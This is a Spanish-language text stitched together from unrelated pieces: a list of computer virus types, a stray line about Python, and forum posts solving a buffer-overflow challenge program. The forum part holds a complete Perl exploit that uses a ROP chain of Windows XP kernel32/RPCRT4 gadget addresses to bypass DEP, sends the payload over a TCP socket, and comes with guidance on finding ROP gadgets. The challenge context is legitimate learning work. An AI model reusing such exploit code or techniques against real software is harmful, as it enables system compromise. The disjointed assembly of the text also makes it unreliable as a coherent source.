Existen diversos tipos de virus, varían según su función o la manera en que este se ejecuta en nuestra computadora alterando la actividad de la misma, entre los más comunes están:



Troyano: Consiste en robar información o alterar el sistema del hardware o en un caso extremo permite que un usuario externo pueda controlar el equipo.
Gusano: Tiene la propiedad de duplicarse a sí mismo. Los gusanos utilizan las partes automáticas de un sistema operativo que generalmente son invisibles al usuario.
Bombas lógicas o de tiempo: Son programas que se activan al producirse un acontecimiento determinado. La condición suele ser una fecha (Bombas de Tiempo), una combinación de teclas, o ciertas condiciones técnicas (Bombas Lógicas). Si no se produce la condición permanece oculto al usuario.
Hoax: Los hoax no son virus ni tienen capacidad de reproducirse por si solos. Son mensajes de contenido falso que incitan al usuario a hacer copias y enviarla a sus contactos. Suelen apelar a los sentimientos morales ("Ayuda a un niño enfermo de cáncer") o al espíritu de solidaridad ("Aviso de un nuevo virus peligrosísimo") y, en cualquier caso, tratan de aprovecharse de la falta de experiencia de los internautas novatos.
Joke: Al igual que los hoax, no son virus, pero son molestos, un ejemplo: una página pornográfica que se mueve de un lado a otro, y si se le llega a dar a cerrar es posible que salga una ventana que diga: OMFG!! No se puede cerrar!.
Otros tipos por distintas caracterísitcas son los que se relacionan a continuación:

Virus residentes
La característica principal de estos virus es que se ocultan en la memoria RAM de forma permanente o residente. De este modo, pueden controlar e interceptar todas las operaciones llevadas a cabo por el sistema operativo, infectando todos aquellos ficheros y/o programas que sean ejecutados, abiertos, cerrados, renombrados, copiados. Algunos ejemplos de este tipo de virus son: Randex, CMJ, Meve, MrKlunky.

Virus de acción directa
Al contrario que los residentes, estos virus no permanecen en memoria. Por tanto, su objetivo prioritario es reproducirse y actuar en el mismo momento de ser ejecutados. Al cumplirse una determinada condición, se activan y buscan los ficheros ubicados dentro de su mismo directorio para contagiarlos.

Virus de sobreescritura
Estos virus se caracterizan por destruir la información contenida en los ficheros que infectan. Cuando infectan un fichero, escriben dentro de su contenido, haciendo que queden total o parcialmente inservibles.

Virus de boot (bot_kill) o de arranque
Los términos boot o sector de arranque hacen referencia a una sección muy importante de un disco o unidad de almacenamiento CD, DVD, memorias USB etc. En ella se guarda la información esencial sobre las características del disco y se encuentra un programa que permite arrancar el ordenador. Este tipo de virus no infecta ficheros, sino los discos que los contienen. Actúan infectando en primer lugar el sector de arranque de los dispositivos de almacenamiento. Cuando un ordenador se pone en marcha con un dispositivo de almacenamiento, el virus de boot infectará a su vez el disco duro.

Los virus de boot no pueden afectar al ordenador mientras no se intente poner en marcha a éste último con un disco infectado. Por tanto, el mejor modo de defenderse contra ellos es proteger los dispositivos de almacenamiento contra escritura y no arrancar nunca el ordenador con uno de estos dispositivos desconocido en el ordenador.

Algunos ejemplos de este tipo de virus son: Polyboot.B, AntiEXE.

Virus de enlace o directorio
Los ficheros se ubican en determinadas direcciones (compuestas básicamente por unidad de disco y directorio), que el sistema operativo conoce para poder localizarlos y trabajar con ellos.

Los virus de enlace o directorio alteran las direcciones que indican donde se almacenan los ficheros. De este modo, al intentar ejecutar un programa (fichero con extensión EXE o COM) infectado por un virus de enlace, lo que se hace en realidad es ejecutar el virus, ya que éste habrá modificado la dirección donde se encontraba originalmente el programa, colocándose en su lugar.

Una vez producida la infección, resulta imposible localizar y trabajar con los ficheros originales.

Virus cifrados
Más que un tipo de virus, se trata de una técnica utilizada por algunos de ellos, que a su vez pueden pertenecer a otras clasificaciones. Estos virus se cifran a sí mismos para no ser detectados por los programas antivirus. Para realizar sus actividades, el virus se descifra a sí mismo y, cuando ha finalizado, se vuelve a cifrar.

Virus polimórficos
Son virus que en cada infección que realizan se cifran de una forma distinta (utilizando diferentes algoritmos y claves de cifrado). De esta forma, generan una elevada cantidad de copias de sí mismos e impiden que los antivirus los localicen a través de la búsqueda de cadenas o firmas, por lo que suelen ser los virus más costosos de detectar.

Virus multipartites
Virus muy avanzados, que pueden realizar múltiples infecciones, combinando diferentes técnicas para ello. Su objetivo es cualquier elemento que pueda ser infectado: archivos, programas, macros, discos, etc.

Virus del fichero
Infectan programas o ficheros ejecutables (ficheros con extensiones EXE y COM). Al ejecutarse el programa infectado, el virus se activa, produciendo diferentes efectos.

Virus de FAT
La tabla de asignación de ficheros o FAT (del inglés File Allocation Table) es la sección de un disco utilizada para enlazar la información contenida en éste. Se trata de un elemento fundamental en el sistema. Los virus que atacan a este elemento son especialmente peligrosos, ya que impedirán el acceso a ciertas partes del disco, donde se almacenan los ficheros críticos para el normal funcionamiento del ordenador.

por otro lado tienes Python que es potente y simple, solo lado cliente y es un lenguaje de script... cosa que seguro ahora no tiene sentido...

Gracias a todos por sus respuestas. Pero sigo teniendo problemas. No entiendo que estoy haciendo mal.

Comprobé las direcciones de las funciones ocultas, y coinciden con las de mi máquina. No debería haber problema.

Ahora una pregunta: Esa variable $eip = pack('V', 0x7c87f30e) puedo sustituirla por la funcion oculta directamente??? ¿Como puedo obtener yo la direccion de un ROP??

Es que estoy teniendo problemas con los exploits sencillos, y entender eso de ROPs me está costando porque no tengo experiencia previa. ¿Será que puedo explotarlo sin usar ROPs??? Creo que mi sistema tiene DEP desactivado por defecto. No habría problema, verdad??? Intenté eliminar los ROPs, pero falló igual.

Podrías explicarme brevemente como encontrar eso de ROPs??? Solo por encima, yo profundizo con internet a partir de lo que me digan.

Ah, y porque para rellenar se necesitan 64 bytes, si en mi codigo es de 60??? Estaba afectando el alignment???

Gracias por su ayuda a todos. Perdon por la preguntadera. Esto de explotar es díficil, al menos en principio. Y de paso el bachillerato no me deja tiempo para practicar. XD

R: Si te refieres con valores a los address/direcciones esto depende de algunos factores:
Escenario caso ideal (sin ningún tipo de protección).
- Si el address se encuentra dentro del ejecutable (módulo cargado o ejecutable mismo) no deberías cambiarlo.
- Si el address es del sistema, deberías cambiarlo ya que los módulos del sistema varían de acuerdo al idioma, sp del sistema.

Escenario caso real (protecciones).
- En este caso deberías cambiar prácticamente todo, ya que si existe ASLR las direcciones variarán cada vez que arranque el sistema (aunque las DLL utilizadas no poseían la protección ASLR por lo cual el sistema no debería cambiar su base address).

---

R: Mira en cada address coloqué lo que hace cada instrucción con comentarios, ya que la idea del ROP (programación orientada al retorno) es evitar DEP el cual no permite ejecutar código en ciertos lugares del ejecutable como lo es el heap o el stack (Poner EIP con JMP ESP y ejecutar código en el stack). En palabras simples debes tomar las direcciones y buscarlas en el depurador, si están en tu sistema y pose la misma secuencia de instrucciones que puse comentadas es por que está bien y debería funcionar, ahora si no son las mismas instrucciones deberás localizar las instrucciones con algún script (puedes usar mona, un script en python para inmunity debugger).
Por cierto yo hace un tiempo atrás hice un script para OllyScript (plugins de OllyDbg) si quieres lo puedo publicar.

---

R: Quizás por comodidad ya que Perl y Python al ser lenguajes intérpretes ahorras tiempo, imagínate tener que estar compilando cada vez que intentas hacer funcionar el exploit, por ejemplo yo habré intentado ejecutar el exploit unas 50 o 60 veces como mínimo, hazte la idea, ahora cual es mejor, mmmm depende de cual se te acomode más a mi se me hace muy sencillo perl, no manejo python aunque se ve bonito con sus identación.

---

R:Mmm depende del punto de vista, si eres la víctima es recomendable tener DEP activado, si eres el atacante es recomendable que el sistema tenga DEP desactivado, en cuanto si afecta, si el exploit está diseñado para evadir DEP es decir utilizar secuencia de ROPs entonces independiente de que DEP esté activado o no NO afecta. Esto se explica por que DEP a simples rasgos marca zonas del ejecutable como no permitidas para ejecutar código como por ejemplo HEAP y STACK entonces el exploit que no evade el DEP saltará al stack y ejecutará la shellcode o payload entonces al intentar ejecutar código en una zona no permita, se generará una excepción irrecuperable, por eso la invención de las cadenas ROPs que si te fijas solo se encargan de ejecutar instrucciones ya existentes las cuales se encuentran en zonas permitidas para ejecutar y siempre terminan con un ret ya que siempre estarán volviendo a la siguiente cadena del stack.

Solución Server Vuln de harry_the_blogger

Problema:
- Se debe lograr ejecutar dos funciones ocultas ubicadas en un ejecutable vulnerable a stack buffer overflow (desbordamiento de pila), por lo menos eso es lo que alude el ejecutable, harry_the_blogger no mencionó el objetivo del juego  .

Solución:
La idea principal es lograr modificar PC (program counter) que en este caso (arquitectura) es lo que apunta el registro EIP, para ello la composición del exploit sería el siguiente:

Esto se podría realizar, pero el problema que tendríamos principalmente serían las direcciones de las funciones ocultas ya que estas contienen bytes nulos (null bytes), lo cual nos "cortaría" el flujo de nuestro exploit, para ello tenemos como solución lo siguiente:

Pero pfff y que ocurre con DEP ?   Si usáramos esta solución, el sistema no nos permitiría la ejecución de código en el stack (mecanismo de protección).

Solución final:
Como solución propuesta, se me ocurrió utilizar cadenas ROP lo cual nos permitirá ejecutar código del mismo ejecutable y módulos cargados, el cual terminará llamando a las dos funciones ocultas y evitando la protección DEP:

# Operating system = Microsoft Windows XP Profesional Versión 2002 Service Pack 2
# Language         = Spanish
# Required DLL     = kernel32.dll | RPCRT4.dll
# Author           = UND3R
 
use strict;
use Socket;
my $junk = "\x41" x 64;
my $eip = pack('V', 0x7c87f30e);	# kernel32.dll | POP EAX;POP EBP;RETN
my $hidden_two = pack('V', 0x373e47db);	# 0x40105E - 0xC901C883 = 0x373E47DB
my $hidden_one = pack('V', 0x373e47b3);	# 0x401036 - 0xC901C883 = 0x373E47B3
my $rop1 = pack('V', 0x7c80ad03);	# kernel32.dll | ADD EAX,0xC901C883;RETN
my $rop2 = pack('V', 0x7c80b0eb);	# kernel32.dll | XCHG EAX,EBP
my $rop3 = pack('V', 0x7c80ad03);	# kernel32.dll | ADD EAX,0xC901C883;RETN
my $rop4 = pack('V', 0x77e61acc);	# RPCRT4.dll | CALL EAX;RETN
my $rop5 = pack('V', 0x7c80b0eb);	# kernel32.dll | XCHG EAX,EBP
my $rop6 = pack('V', 0x77e61acc);	# RPCRT4.dll | CALL EAX;RETN
 
my $exploit = $junk . $eip . $hidden_two . $hidden_one . $rop1 . $rop2 . $rop3 . $rop4 . $rop5 . $rop6;
 
# initialize host and port
my $host = shift || 'localhost';
my $port = shift || 6666;
 
my $proto = getprotobyname('tcp');
 
# get the port address
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);
 
print "[+] Setting up socket\n";
# create the socket, connect to the port
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";
 
print "[+] Sending payload (size = " . length($exploit) . ") \n";
print SOCKET $exploit."\n";
 
print "[+] Payload sent\n";
close SOCKET or die "close: $!";

- ¿Es standard?
Lamentablemente no ya que utiliza dos DLL cargadas por el sistema (las mencioné en el exploit). No lo pude hacer standard/genérico ya que al ser un ejecutable muy sencillo y no contar con sus propias DLL se me fue imposible encontrar cadenas ROP dentro de él y tuve que buscar DLLs del sistema.

- Saludos y agradecimientos
harry_the_blogger genial amigo que manera de programa muy linda y nada mejor que postees este tipo de retos en el foro lo cual a mi criterio simplemente aporta conocimiento y a Don Videla que ya nos veremos.


Aquí una imagen de la ejecución del exploit, por cierto DEP arrancó pero luego de haber ejecutado las funciones ocultas (seguramente por el desbordamiento ocasionado):


PD: Voy en un bus viajando así que perdona si no me pude explicar bien, si tienes alguna duda, con gusto te respondo